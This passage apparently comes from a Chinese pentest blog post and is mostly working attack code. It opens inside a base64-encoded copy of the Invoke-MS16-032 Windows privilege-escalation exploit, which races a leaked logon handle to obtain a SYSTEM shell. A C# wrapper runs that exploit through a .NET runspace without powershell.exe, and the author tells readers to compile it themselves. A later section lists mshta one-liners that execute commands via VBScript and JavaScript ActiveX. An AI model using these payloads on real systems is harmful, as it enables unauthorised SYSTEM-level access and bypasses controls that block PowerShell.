jcm9zb2Z0IDspCiAgICAgICAgJENhbGxSZXN1bHQgPSBbTnRkbGxdOjpOdEltcGVyc29uYXRlVGhyZWFkKCRUaHJlYWQsICRUaHJlYWQsIFtyZWZdJHNxb3MpCiAgICAgICAgaWYgKCRDYWxsUmVzdWx0IC1uZSAwKSB7CiAgICAgICAgICAgIGVjaG8gIlshXSBOdEltcGVyc29uYXRlVGhyZWFkIGZhaWxlZCwgbW92aW5nIG9uLi4iCiAgICAgICAgICAgICRDYWxsUmVzdWx0ID0gW0tlcm5lbDMyXTo6UmVzdW1lVGhyZWFkKCRUaHJlYWQpCiAgICAgICAgICAgIGVjaG8gIlsrXSBUaHJlYWQgcmVzdW1lZCEiCiAgICAgICAgICAgIFJldHVybgogICAgICAgIH0KICAgIAogICAgICAgICRzY3JpcHQ6U3lzVG9rZW5IYW5kbGUgPSBbSW50UHRyXTo6WmVybwogICAgICAgICMgMHgwMDA2IC0tPiBUT0tFTl9EVVBMSUNBVEUgLWJvciBUT0tFTl9JTVBFUlNPTkFURQogICAgICAgICRDYWxsUmVzdWx0ID0gW0FkdmFwaTMyXTo6T3BlblRocmVhZFRva2VuKCRUaHJlYWQsIDB4MDAwNiwgJGZhbHNlLCBbcmVmXSRTeXNUb2tlbkhhbmRsZSkKICAgICAgICBpZiAoISRDYWxsUmVzdWx0KSB7CiAgICAgICAgICAgIGVjaG8gIlshXSBPcGVuVGhyZWFkVG9rZW4gZmFpbGVkLCBtb3Zpbmcgb24uLiIKICAgICAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpSZXN1bWVUaHJlYWQoJFRocmVhZCkKICAgICAgICAgICAgZWNobyAiWytdIFRocmVhZCByZXN1bWVkISIKICAgICAgICAgICAgUmV0dXJuCiAgICAgICAgfQogICAgICAgIAogICAgICAgIGVjaG8gIls/XSBTdWNjZXNzLCBvcGVuIFNZU1RFTSB0b2tlbiBoYW5kbGU6ICRTeXNUb2tlbkhhbmRsZSIKICAgICAgICBlY2hvICJbK10gUmVzdW1pbmcgdGhyZWFkLi4iCiAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpSZXN1bWVUaHJlYWQoJFRocmVhZCkKICAgIH0KICAgIAogICAgIyBtYWluKCkgPC0tLSA7KQogICAgJG1zMTYwMzIgPSBAIgogICAgIF9fIF9fIF9fXyBfX18gICBfX18gICAgIF9fXyBfX18gX19fIAogICAgfCAgViAgfCAgX3xfICB8IHwgIF98X19ffCAgIHxfICB8XyAgfAogICAgfCAgICAgfF8gIHxffCB8X3wgLiB8X19ffCB8IHxfICB8ICBffAogICAgfF98X3xffF9fX3xfX19fX3xfX198ICAgfF9fX3xfX198X19ffAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICBbYnkgYjMzZiAtPiBARnV6enlTZWNdCiJACiAgICAKICAgICRtczE2MDMyCiAgICAKICAgICMgQ2hlY2sgbG9naWNhbCBwcm9jZXNzb3IgY291bnQsIHJhY2UgY29uZGl0aW9uIHJlcXVpcmVzIDIrCiAgICBlY2hvICJgbls/XSBPcGVyYXRpbmcgc3lzdGVtIGNvcmUgY291bnQ6ICQoW1N5c3RlbS5FbnZpcm9ubWVudF06OlByb2Nlc3NvckNvdW50KSIKICAgIGlmICgkKFtTeXN0ZW0uRW52aXJvbm1lbnRdOjpQcm9jZXNzb3JDb3VudCkgLWx0IDIpIHsKICAgICAgICBlY2hvICJbIV0gVGhpcyBpcyBhIFZNIGlzbid0IGl0LCByYWNlIGNvbmRpdGlvbiByZXF1aXJlcyBhdCBsZWFzdCAyIENQVSBjb3JlcywgZXhpdGluZyFgbiIKICAgICAgICBSZXR1cm4KICAgIH0KICAgIAogICAgIyBDcmVhdGUgYXJyYXkgZm9yIFRocmVhZHMgJiBUSUQncwogICAgJFRocmVhZEFycmF5ID0gQCgpCiAgICAkVGlkQXJyYXkgPSBAKCkKICAgIAogICAgZWNobyAiWz5dIER1cGxpY2F0aW5nIENyZWF0ZVByb2Nlc3NXaXRoTG9nb25XIGhhbmRsZXMuLiIKICAgICMgTG9vcCBHZXQtVGhyZWFkSGFuZGxlIGFuZCBjb2xsZWN0IHRocmVhZCBoYW5kbGVzIHdpdGggYSB2YWxpZCBUSUQKICAgIGZvciAoJGk9MDsgJGkgLWx0IDUwMDsgJGkrKykgewogICAgICAgICRoVGhyZWFkID0gR2V0LVRocmVhZEhhbmRsZQogICAgICAgICRoVGhyZWFkSUQgPSBbS2VybmVsMzJdOjpHZXRUaHJlYWRJZCgkaFRocmVhZCkKICAgICAgICAjIEJpdCBoYWNreS9sYXp5LCBmaWx0ZXJzIG9uIHVuaXEvdmFsaWQgVElEJ3MgdG8gY3JlYXRlICRUaHJlYWRBcnJheQogICAgICAgIGlmICgkVGlkQXJyYXkgLW5vdGNvbnRhaW5zICRoVGhyZWFkSUQpIHsKICAgICAgICAgICAgJFRpZEFycmF5ICs9ICRoVGhyZWFkSUQKICAgICAgICAgICAgaWYgKCRoVGhyZWFkIC1uZSAwKSB7CiAgICAgICAgICAgICAgICAkVGhyZWFkQXJyYXkgKz0gJGhUaHJlYWQgIyBUaGlzIGlzIHdoYXQgd2UgbmVlZCEKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIH0KICAgIAogICAgaWYgKCQoJFRocmVhZEFycmF5Lmxlbmd0aCkgLWVxIDApIHsKICAgICAgICBlY2hvICJbIV0gTm8gdmFsaWQgdGhyZWFkIGhhbmRsZXMgd2VyZSBjYXB0dXJlZCwgZXhpdGluZyEiCiAgICAgICAgUmV0dXJuCiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIls/XSBEb25lLCBnb3QgJCgkVGhyZWFkQXJyYXkubGVuZ3RoKSB0aHJlYWQgaGFuZGxlKHMpISIKICAgICAgICBlY2hvICJgbls/XSBUaHJlYWQgaGFuZGxlIGxpc3Q6IgogICAgICAgICRUaHJlYWRBcnJheQogICAgfQogICAgCiAgICBlY2hvICJgblsqXSBTbmlmZmluZyBvdXQgcHJpdmlsZWdlZCBpbXBlcnNvbmF0aW9uIHRva2VuLi4iCiAgICBmb3JlYWNoICgkVGhyZWFkIGluICRUaHJlYWRBcnJheSl7CiAgICAKICAgICAgICAjIEdldCBoYW5kbGUgdG8gU1lTVEVNIGFjY2VzcyB0b2tlbgogICAgICAgIEdldC1TeXN0ZW1Ub2tlbgogICAgICAgIAogICAgICAgIGVjaG8gImBuWypdIFNuaWZmaW5nIG91dCBTWVNURU0gc2hlbGwuLiIKICAgICAgICBlY2hvICJgbls+XSBEdXBsaWNhdGluZyBTWVNURU0gdG9rZW4iCiAgICAgICAgJGhEdXBsaWNhdGVUb2tlbkhhbmRsZSA9IFtJbnRQdHJdOjpaZXJvCiAgICAgICAgJENhbGxSZXN1bHQgPSBbQWR2YXBpMzJdOjpEdXBsaWNhdGVUb2tlbigkU3lzVG9rZW5IYW5kbGUsIDIsIFtyZWZdJGhEdXBsaWNhdGVUb2tlbkhhbmRsZSkKICAgICAgICAKICAgICAgICAjIFNpbXBsZSBQUyBydW5zcGFjZSBkZWZpbml0aW9uCiAgICAgICAgZWNobyAiWz5dIFN0YXJ0aW5nIHRva2VuIHJhY2UiCiAgICAgICAgJFJ1bnNwYWNlID0gW3J1bnNwYWNlZmFjdG9yeV06OkNyZWF0ZVJ1bnNwYWNlKCkKICAgICAgICAkU3RhcnRUb2tlblJhY2UgPSBbcG93ZXJzaGVsbF06OkNyZWF0ZSgpCiAgICAgICAgJFN0YXJ0VG9rZW5SYWNlLnJ1bnNwYWNlID0gJFJ1bnNwYWNlCiAgICAgICAgJFJ1bnNwYWNlLk9wZW4oKQogICAgICAgIFt2b2lkXSRTdGFydFRva2VuUmFjZS5BZGRTY3JpcHQoewogICAgICAgICAgICBQYXJhbSAoJFRocmVhZCwgJGhEdXBsaWNhdGVUb2tlbkhhbmRsZSkKICAgICAgICAgICAgd2hpbGUgKCR0cnVlKSB7CiAgICAgICAgICAgICAgICAkQ2FsbFJlc3VsdCA9IFtBZHZhcGkzMl06OlNldFRocmVhZFRva2VuKFtyZWZdJFRocmVhZCwgJGhEdXBsaWNhdGVUb2tlbkhhbmRsZSkKICAgICAgICAgICAgfQogICAgICAgIH0pLkFkZEFyZ3VtZW50KCRUaHJlYWQpLkFkZEFyZ3VtZW50KCRoRHVwbGljYXRlVG9rZW5IYW5kbGUpCiAgICAgICAgJEFzY09iaiA9ICRTdGFydFRva2VuUmFjZS5CZWdpbkludm9rZSgpCiAgICAgICAgCiAgICAgICAgZWNobyAiWz5dIFN0YXJ0aW5nIHByb2Nlc3MgcmFjZSIKICAgICAgICAjIEFkZGluZyBhIHRpbWVvdXQgKDEwIHNlY29uZHMpIGhlcmUgdG8gc2FmZWd1YXJkIGZyb20gZWRnZS1jYXNlcwogICAgICAgICRTYWZlR3VhcmQgPSBbZGlhZ25vc3RpY3Muc3RvcHdhdGNoXTo6U3RhcnROZXcoKQogICAgICAgIHdoaWxlICgkU2FmZUd1YXJkLkVsYXBzZWRNaWxsaXNlY29uZHMgLWx0IDEwMDAwKSB7CiAgICAgICAgIyBTdGFydHVwSW5mbyBTdHJ1Y3QKICAgICAgICAkU3RhcnR1cEluZm8gPSBOZXctT2JqZWN0IFNUQVJUVVBJTkZPCiAgICAgICAgJFN0YXJ0dXBJbmZvLmNiID0gW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6U2l6ZU9mKCRTdGFydHVwSW5mbykgIyBTdHJ1Y3QgU2l6ZQogICAgICAgICRTdGFydHVwSW5mby5kd0ZsYWdzID0gMHgwMDAwMDEwMSAjIFNUQVJURl9VU0VTVERIQU5ETEVTCiAgICAgICAgICAgICRTdGFydHVwSW5mby53U2hvd1dpbmRvdyA9IDA7CiAgICAgICAgIyBQcm9jZXNzSW5mbyBTdHJ1Y3QKICAgICAgICAkUHJvY2Vzc0luZm8gPSBOZXctT2JqZWN0IFBST0NFU1NfSU5GT1JNQVRJT04KICAgICAgICAKICAgICAgICAjIENyZWF0ZVByb2Nlc3NXaXRoTG9nb25XIC0tPiBscEN1cnJlbnREaXJlY3RvcnkKICAgICAgICAkR2V0Q3VycmVudFBhdGggPSAoR2V0LUl0ZW0gLVBhdGggIi5cIiAtVmVyYm9zZSkuRnVsbE5hbWUKICAgICAgICAKICAgICAgICAjIExPR09OX05FVENSRURFTlRJQUxTX09OTFkgLyBDUkVBVEVfU1VTUEVOREVECiAgICAgICAgJENhbGxSZXN1bHQgPSBbQWR2YXBpMzJdOjpDcmVhdGVQcm9jZXNzV2l0aExvZ29uVygKICAgICAgICAgICAgInVzZXIiLCAiZG9tYWluIiwgInBhc3MiLAogICAgICAgICAgICAweDAwMDAwMDAyLCAkQXBwbGljYXRpb24sJENvbW1hbmRsaW5lLAogICAgICAgICAgICAweDAwMDAwMDA0LCAkbnVsbCwgJEdldEN1cnJlbnRQYXRoLAogICAgICAgICAgICBbcmVmXSRTdGFydHVwSW5mbywgW3JlZl0kUHJvY2Vzc0luZm8pCiAgICAgICAgICAgIAogICAgICAgICRoVG9rZW5IYW5kbGUgPSBbSW50UHRyXTo6WmVybwogICAgICAgICRDYWxsUmVzdWx0ID0gW0FkdmFwaTMyXTo6T3BlblByb2Nlc3NUb2tlbigkUHJvY2Vzc0luZm8uaFByb2Nlc3MsIDB4MjgsIFtyZWZdJGhUb2tlbkhhbmRsZSkKICAgICAgICAjIElmIHdlIGNhbid0IG9wZW4gdGhlIHByb2Nlc3MgdG9rZW4gaXQncyBhIFNZU1RFTSBzaGVsbCEKICAgICAgICBpZiAoISRDYWxsUmVzdWx0KSB7CiAgICAgICAgICAgIGVjaG8gIlshXSBIb2x5IGhhbmRsZSBsZWFrIEJhdG1hbiwgd2UgaGF2ZSBhIFNZU1RFTSBzaGVsbCEhYG4iCiAgICAgICAgICAgICRDYWxsUmVzdWx0ID0gW0tlcm5lbDMyXTo6UmVzdW1lVGhyZWFkKCRQcm9jZXNzSW5mby5oVGhyZWFkKQogICAgICAgICAgICAkU3RhcnRUb2tlblJhY2UuU3RvcCgpCiAgICAgICAgICAgICRTYWZlR3VhcmQuU3RvcCgpCiAgICAgICAgICAgIFJldHVybgogICAgICAgIH0KICAgICAgICAgICAgCiAgICAgICAgIyBDbGVhbiB1cCBzdXNwZW5kZWQgcHJvY2VzcwogICAgICAgICRDYWxsUmVzdWx0ID0gW0tlcm5lbDMyXTo6VGVybWluYXRlUHJvY2VzcygkUHJvY2Vzc0luZm8uaFByb2Nlc3MsIDEpCiAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpDbG9zZUhhbmRsZSgkUHJvY2Vzc0luZm8uaFByb2Nlc3MpCiAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpDbG9zZUhhbmRsZSgkUHJvY2Vzc0luZm8uaFRocmVhZCkKICAgICAgICB9CiAgICAgICAgCiAgICAgICAgIyBLaWxsIHJ1bnNwYWNlICYgc3RvcHdhdGNoIGlmIGVkZ2UtY2FzZQogICAgICAgICRTdGFydFRva2VuUmFjZS5TdG9wKCkKICAgICAgICAkU2FmZUd1YXJkLlN0b3AoKQogICAgfQp9"));
        public void ExecuteSynchronously(string aplication,string commandline)
        {
            string Commandout;
            InitialSessionState iss = InitialSessionState.CreateDefault();
            Runspace rs = RunspaceFactory.CreateRunspace(iss);
            rs.Open();
            PowerShell ps = PowerShell.Create();
            ps.Runspace = rs;
            ps.AddScript(PSInvoke_MS16_032);
            if (commandline != "")
            {
                 Commandout = "Invoke-MS16-032 -Application \"" + aplication + "\" -Commandline " + "\""+commandline+"\"";
            }
            else{
                 Commandout = "Invoke-MS16-032 -Application " + aplication;
            }
            Console.WriteLine(Commandout);
            ps.AddScript(Commandout);
            ps.AddCommand("Out-Default");
            ps.Invoke();
            rs.Close();
        }
    }
}

base64的内容是 https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1 的所有内容的base64编码(你可以使用你自己的powershell脚本),由于我改的这个是有参数的,所以简单的写了上面的c#代码,通过.net来执行powershell。

编译需要System.Management.Automation.dll,具体步骤在cs文件里面已经写了,你们自己编译吧,只是对本机进行了测试,没测试别的,测试Demo如下:

http://static.wooyun.org/upload/image/201606/2016063013052815262.gif

通过.net来执行powershell,并不需要powershell.exe 。详情可以看一下 p0wnedShell 或者 http://zone.wooyun.org/content/26831

.net 2.0下编译的版本在这里

Exec Commands Via Mshta.exe

用“世界上最好的编程语言”制作的敲诈者木马揭秘的时候发现,攻击者使用mshta来执行命令,之前没怎么接触过,查了查资料也不是很多,mshta是用来执行hta文件的,经过测试发现,其实没有hta文件,也可以通过mshta来执行命令的,经过几次测试发现mshta不仅可以使用vbscript,而且可以使用javascript来执行命令,整理payload如下:

VBSCRIPT EXEC

mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)

JAVASCRIPT EXEC

mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}

- 阅读剩余部分 -